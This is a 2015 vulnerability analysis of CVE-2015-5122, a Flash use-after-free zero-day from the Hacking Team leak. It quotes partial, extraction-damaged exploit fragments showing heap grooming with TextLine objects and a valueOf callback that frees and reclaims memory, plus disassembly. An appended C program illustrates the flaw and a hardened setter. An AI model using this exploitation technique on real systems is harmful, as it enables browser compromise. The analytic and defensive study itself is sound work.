Hacking Team attack code analysis Part 4: Flash 0day vulnerability CVE-2015-5122

2015-07-12T00:00:00
ID MYHACK58:62201564575
Type myhack58
Reporter Anonymous
Modified 2015-07-12T00:00:00

Description

A few days ago we analyzed three pieces of malware from the Hacking Team leak: a Flash 0day, a Flash nday and a Windows font privilege-escalation 0day. Yesterday Adobe released Flash 18.0.0.203, which patches one of the Flash 0days (CVE-2015-5119). Today, however, researchers on Twitter reported that the Hacking Team leak contains another, still unpatched Flash 0day that can be triggered in the latest Flash version. Adobe subsequently released security bulletin APSA15-04; the vulnerability is CVE-2015-5122. It affects IE, Chrome and other mainstream browsers on Windows, Mac OS X and Linux.

Our analysis confirms that this is indeed another new Flash 0day. The root cause is that the setter for the DisplayObject opaqueBackground property does not handle its input correctly: while converting the incoming value it invokes the value's valueOf method, and that callback can free the object the setter is still working on, producing a use-after-free. This article analyzes the origin of the vulnerability and its exploitation.

0x01 Analysis of the exploit principle

The problem lies in the setter function for the DisplayObject object's opaqueBackground property. Let us look at the exploit code disclosed in the Hacking Team leak; the key section is as follows (the loop bounds after "i" were lost when the page was extracted).

1. Fill the heap with TextLine objects:

    for(i=_arLen1; i
        _ar[i] = BT.createTextLine(); // fill 1016-byte holes (0x38c is a size of internal TextLine object)
    for(i=_arLen1; i
        _ar[i].opaqueBackground = 1; // alloc 1016 bytes

During this process each TextLine object gets an internal object of size 0x390 allocated for it; the allocation code is:

    .text:1025DC71 push 1
    .text:1025DC73 push eax
    .text:1025DC74 push 390h
    .text:1025DC79 call operator_new2

Addresses of the 0x390 internal objects allocated while debugging:

    Allocate 0x390 object:04cbc810
    Allocate 0x390 object:0513c810
    Allocate 0x390 object:0513cc08
    Allocate 0x390 object:05d94020
    Allocate 0x390 object:05d94418
    Allocate 0x390 object:05d94810
    Allocate 0x390 object:05d94c08
    Allocate 0x390 object:05d95020
    Allocate 0x390 object:05d95418
    Allocate 0x390 object:05d95810
    Allocate 0x390 object:05d95c08
    Allocate 0x390 object:05d96020
    Allocate 0x390 object:05d96418
    Allocate 0x390 object:05d96810
    Allocate 0x390 object:05d96c08
    Allocate 0x390 object:05d97020
    Allocate 0x390 object:05d97418

2. Set opaqueBackground, which triggers the valueOf call:

    MyClass.prototype.valueOf = valueOf2;

    // here we go, call the vulnerable setter
    _cnt = _arLen2-6;
    _ar[_cnt].opaqueBackground = _mc;

As with the previous two vulnerabilities, the exploit defines its own class and installs its own valueOf function. Inside the opaqueBackground setter the incoming parameter is converted to an integer, and it is this conversion that calls MyClass.valueOf:

    .text:1025DD4C loc_1025DD4C:                  ; CODE XREF: set_opaqueBackground+2Fj
    .text:1025DD4C push ebx
    .text:1025DD4D push [esp+10h+param]
    .text:1025DD51 call ?integer@AvmCore@avmplus@@SAHH@Z ; avmplus::AvmCore::integer(int)

3. Inside the valueOf function, the TextLine object is freed and a Vector is used as a placeholder (the listing is cut off at this point in the page; the conditions after "++_cnt" and "i" were lost in extraction):

    static function valueOf2()
    {
        try
        {
            if (++_cnt
                // recursive call for next TextLine
                _ar[_cnt].opaqueBackground = _mc;
            }else{
                Log("MyClass.valueOf2()");

                // free internal objects
                for(var i:int=1; i
                    BT.recreateTextLine(_ar[_arLen2-i]);
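The defect described above is a general one: a native setter holds a raw pointer to an engine object, then runs script (here the valueOf callback inside AvmCore::integer) before writing through that pointer, and the script can free the object in between. The following C program is an added illustration of that pattern and of the usual fix; it is not code from the exploit, from Adobe or from the AVM, and every name in it (NativeObject, ScriptValue, set_opaque_background_vulnerable, set_opaque_background_hardened, run_setter) is hypothetical. A tiny simulated allocator with an "alive" flag replaces the real heap so that the stale write is reported instead of corrupting memory.

```c
#include <stdbool.h>
#include <stdio.h>

/* Hypothetical stand-in for an engine-side object such as the TextLine internals. */
typedef struct {
    int refcount;
    bool alive;              /* false once the simulated allocator has freed it */
    int opaque_background;
} NativeObject;

/* Simulated allocator: a fixed arena lets us detect a write to a freed slot
   instead of triggering real memory corruption (constructed for this example). */
#define ARENA_SIZE 8
static NativeObject arena[ARENA_SIZE];
static int uaf_detected;     /* number of writes that reached a freed object */

static NativeObject *obj_alloc(void) {
    for (int i = 0; i < ARENA_SIZE; i++) {
        if (!arena[i].alive) {
            arena[i].alive = true;
            arena[i].refcount = 1;
            arena[i].opaque_background = 0;
            return &arena[i];
        }
    }
    return NULL;
}

static void obj_retain(NativeObject *o) { o->refcount++; }

static void obj_release(NativeObject *o) {
    if (--o->refcount == 0) o->alive = false;   /* simulated free */
}

/* A script-controlled value: converting it to an integer runs script,
   exactly as AvmCore::integer() ends up calling a user-defined valueOf(). */
typedef struct {
    int (*value_of)(void *ctx);
    void *ctx;
} ScriptValue;

static int to_integer(const ScriptValue *v) { return v->value_of(v->ctx); }

/* Vulnerable pattern: convert the argument (running script) while holding
   only a raw pointer, then write through that pointer. */
static int set_opaque_background_vulnerable(NativeObject *target, const ScriptValue *v) {
    int color = to_integer(v);              /* script may drop the last reference here */
    if (!target->alive) {                   /* a real engine would not notice this */
        uaf_detected++;
        return -1;
    }
    target->opaque_background = color;
    return 0;
}

/* Hardened pattern: keep a strong reference across the callback so the
   object cannot be freed underneath the setter. */
static int set_opaque_background_hardened(NativeObject *target, const ScriptValue *v) {
    obj_retain(target);
    int color = to_integer(v);
    int rc = 0;
    if (target->alive) target->opaque_background = color;   /* always alive: we hold a ref */
    else rc = -1;
    obj_release(target);                    /* may be the final release, after the write */
    return rc;
}

/* A valueOf() that frees the object the setter is operating on. */
typedef struct { NativeObject *owned; } ReleasingCtx;

static int releasing_value_of(void *ctx) {
    ReleasingCtx *c = ctx;
    obj_release(c->owned);                  /* script drops its reference mid-conversion */
    return 0xff0000;
}

/* Run one setter call against a fresh object; returns the setter's result. */
int run_setter(bool hardened) {
    NativeObject *o = obj_alloc();
    ReleasingCtx ctx = { o };
    ScriptValue v = { releasing_value_of, &ctx };
    return hardened ? set_opaque_background_hardened(o, &v)
                    : set_opaque_background_vulnerable(o, &v);
}

int main(void) {
    printf("vulnerable setter: rc=%d (uaf_detected=%d)\n", run_setter(false), uaf_detected);
    printf("hardened setter:   rc=%d (uaf_detected=%d)\n", run_setter(true), uaf_detected);
    return 0;
}
```

The hardened variant is one of two standard fixes; the other is to convert every script-controlled argument to a plain value before looking up or touching any engine object, so that no raw pointer is live while script runs. Both remove the window the exploit relies on.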
